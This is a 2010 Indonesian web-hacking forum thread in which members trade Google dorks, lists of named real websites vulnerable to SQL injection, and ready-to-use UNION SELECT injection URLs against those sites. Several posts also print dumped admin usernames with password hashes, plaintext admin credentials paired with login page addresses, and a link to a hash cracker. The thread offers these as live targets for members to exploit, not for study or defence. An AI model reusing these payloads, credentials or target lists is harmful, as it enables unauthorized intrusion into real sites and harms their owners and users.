Kumpulan website vulnerable Global - Share disini

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Post Reply
User avatar
^XmoenseN^
Posts: 264
Joined: Sat Aug 11, 2007 7:09 pm
Location: Padang
Contact:

Re: Kumpulan website vulnerable Global - Share disini

Post by ^XmoenseN^ » Mon Aug 02, 2010 9:50 am

:kaca: izin experiment kang poni..... :kaca:
Email : XmoenseN[at]Gmail.com
My blog : http://h4nk.blogspot.com
facebook : http://www.facebook.com/xmoensen
Fanspage : http://www.facebook.com/h4nks
Motto :
"Laut Yang Tenang Tidak Akan Menghasilkan Marinir Yang Tanggung"

d4nker666
Posts: 18
Joined: Sun May 23, 2010 10:29 pm

Re: Kumpulan website vulnerable Global - Share disini

Post by d4nker666 » Tue Aug 03, 2010 9:22 pm

Dork: inurl:"/wp-content/plugins/photoracer/viewimg.php?id="

http://www.badged.gr/wp-content/plugins ... wp_users--
admin:$P$BevtfQubEwX8906CJsplpujfENh0V/0

http://powersimages.com/wp-content/plug ... wp_users--
admin:$P$BpMBM15fSoIWGZ.Jcnep30jco.mMLf.

http://rossodisera.pdferrara.it/wp-cont ... wp_users--
admin:$P$B9RCMVVF7.KD5J8E3goYQcvOd8dv1g1


http://www.chicasrider.cl/wp-content/pl ... wp_users--
edbong:$P$BlRW812yP8RO2zCiZSnzkV8TZtC0ZR0

http://www.soycanarion.es/wp-content/pl ... wp_users--
admin:$P$BVUoU5ekyFj38DHD0vk8MXYq1.D8KA0

http://nudephotocontest.com/wp-content/ ... wp_users--
admin:$P$BHgrGZTWkzz0IAteOyN/jjz67.IR0l.

hash : http://revtan.site40.net/cracker/index.php

User avatar
abit doang
Posts: 212
Joined: Wed Mar 19, 2008 3:51 pm
Location: cd ../
Contact:

Re: Kumpulan website vulnerable Global - Share disini

Post by abit doang » Wed Aug 04, 2010 11:22 pm

dork -> inurl:"cat.php?" site:.au

Code: Select all

http://www.markaline.com.au/cat.php?selectcat=4
http://www.carak.com.au/cat.php?category_id=-14
http://www.kidsbits.com.au/cat.php?category_id=-4
http://www.itac2.com.au/cat.php?category_id=-1
http://www.chrisbrazel.com.au/site/cat.php?cat='11
www.greenfrogpromo.com.au/catalogue/cat.php?cid=7
http://www.healthyuonline.com.au/cat.php?category_id='12

Code: Select all

http://www.jracing.com.au/cat.php?cid=22
n=1
version()    5.0.90
database() [jracing_catalogue ]

Code: Select all

www.pauljones.id.au/photos/cat.php?new=3
N=27
user() peejay_peejay@localhost
version() 5.0.90-community
DBnya banyak -> database() [ peejay_website ] [ peejay_blog ] [ peejay_joomla ] [ peejay_website ]

dump DB -> peejay_blog
[ wp_commentmeta ]
[ wp_comments ]
[ wp_links ]
[ wp_options ]
[ wp_postmeta ]
[ wp_posts ]
[ wp_term_relationships ]
[ wp_term_taxonomy ]
[ wp_terms ]
[ wp_usermeta ]
[ wp_users ] -> dump user:pass & email -->> admin : $P$B7BBJ6bZ3Hm.coZQvr0Nym7G.YZSZy.  [email protected]
Yaa ALLAH, kayakanlah kami semua, agar kami dapat berbagi lebih banyak lagi :)
dan berilah kepada kami, jodoh yg terbaik dari sisiMU.
aamiin.. :D

http://abid912.wordpress.com/
http://maniak-online.blogspot.com/

User avatar
abit doang
Posts: 212
Joined: Wed Mar 19, 2008 3:51 pm
Location: cd ../
Contact:

Re: Kumpulan website vulnerable Global - Share disini

Post by abit doang » Thu Aug 05, 2010 1:37 am

SPESIAL -> VERSI 4.X :pusing:

Code: Select all

http://www.djz.edu.my/freeonline/cat.php?cat=-1+UNION+ALL+SELECT+1,VERSION(),3,4,5,6,7,8,9,10--
SPESIAL -> LANGSUNG LOGIN :devil

Code: Select all

http://www.unistream.com.sg/cat.php?catid=1+AND+1=2+UNION+ALL+SELECT+user(),group_concat(table_name)+FROM+information_schema.
tables+where+table_schema=database()--
admin:fahzijelex 
http://www.unistream.com.sg/admin/index.php

Code: Select all

http://www.pennzoil.com.my/gallery-cat.php?categoryid='7
http://www.hillssa.com.au/clientwebs/mms/cat.php?catid='55
dork -> inurl:"cat.php?" site:TERSERAH
:malumalu: :pusing: :licik: :devil :tapa:

simpenan lama nih,..

Code: Select all

http://www.seddonsofbeverley.co.uk/main.php?recordID=103+AND+1=2+UNION+SELECT+0,null,concat(username,0x3a,password)+from+login--
Yaa ALLAH, kayakanlah kami semua, agar kami dapat berbagi lebih banyak lagi :)
dan berilah kepada kami, jodoh yg terbaik dari sisiMU.
aamiin.. :D

http://abid912.wordpress.com/
http://maniak-online.blogspot.com/

User avatar
abit doang
Posts: 212
Joined: Wed Mar 19, 2008 3:51 pm
Location: cd ../
Contact:

Re: Kumpulan website vulnerable Global - Share disini

Post by abit doang » Sat Aug 07, 2010 6:54 pm

smoga gak repost,.

Code: Select all

http://www.fragrance.org/news_detail.php?id=-36+union+all+select%201,2,group_concat(column_name),4,5,6+from+information_schema.columns+where+table_name=0x636d735f61646d696e--

http://www.waballet.com.au/whats_on.php?id=-31+union+all+select+0,1,version(),database(),4,5,6,7,8,9,10,11--

http://www.catlifttruck.com.sg/news/newsitem.php?news_id=-6+union+select+0,1,2--
Yaa ALLAH, kayakanlah kami semua, agar kami dapat berbagi lebih banyak lagi :)
dan berilah kepada kami, jodoh yg terbaik dari sisiMU.
aamiin.. :D

http://abid912.wordpress.com/
http://maniak-online.blogspot.com/

User avatar
poni
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia
Contact:

Re: Kumpulan website vulnerable Global - Share disini

Post by poni » Sat Aug 07, 2010 8:07 pm

Nih dapat target baru dari Bug Sqli yang ditemukan darkzzzz
dork :

Code: Select all

inurl:rubID=

Code: Select all

http://www.planbar.com/coRED/content/jobs/index.php?rubID=1
http://www.glovital.ch/www/content.php?rubid='85
http://www.drhaworth.com/procedures.php?procid='50
http://www.teledom.fr/sint_maarten/lire/index.php?rubid='6
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001

User avatar
demonbrando
Posts: 342
Joined: Thu Oct 15, 2009 12:49 am

Re: Kumpulan website vulnerable Global - Share disini

Post by demonbrando » Sat Aug 07, 2010 11:56 pm

rubID itu apa yah om poni??maap masih newbie.. :maaf: :maaf:
jalani hidup ini dengan santai tapi jangan lupa ibadah..

User avatar
antebas
Posts: 3
Joined: Sun Aug 08, 2010 7:21 pm

Re: Kumpulan website vulnerable Global - Share disini

Post by antebas » Sun Aug 08, 2010 7:43 pm

abit doang wrote:smoga gak repost,.

Code: Select all

http://www.fragrance.org/news_detail.php?id=-36+union+all+select%201,2,group_concat(column_name),4,5,6+from+information_schema.columns+where+table_name=0x636d735f61646d696e--

http://www.waballet.com.au/whats_on.php?id=-31+union+all+select+0,1,version(),database(),4,5,6,7,8,9,10,11--

http://www.catlifttruck.com.sg/news/newsitem.php?news_id=-6+union+select+0,1,2--
Tak terusin ya om ....... :maaf:

http://www.mitforklift.com.sg/admin/login.php
mcfs:mcfs

http://www.catlifttruck.com.sg/admin/login.php
mcfs:mcfs

User avatar
abit doang
Posts: 212
Joined: Wed Mar 19, 2008 3:51 pm
Location: cd ../
Contact:

Re: Kumpulan website vulnerable Global - Share disini

Post by abit doang » Sun Aug 08, 2010 9:44 pm

antebas wrote: Tak terusin ya om ....... :maaf:
http://www.mitforklift.com.sg/admin/login.php
mcfs:mcfs
http://www.catlifttruck.com.sg/admin/login.php
mcfs:mcfs
mantap dah,..
just info buat yg belom tau,..
site *.sg tuh banyak yang nggak di hash passwordnya..
jadi silakan di explore,..
Yaa ALLAH, kayakanlah kami semua, agar kami dapat berbagi lebih banyak lagi :)
dan berilah kepada kami, jodoh yg terbaik dari sisiMU.
aamiin.. :D

http://abid912.wordpress.com/
http://maniak-online.blogspot.com/

User avatar
poni
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia
Contact:

Re: Kumpulan website vulnerable Global - Share disini

Post by poni » Sun Aug 08, 2010 9:55 pm

Hehehe. Abit doang paling rajin post vuln web.mantap.
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001

Post Reply

Return to “Web Hacking”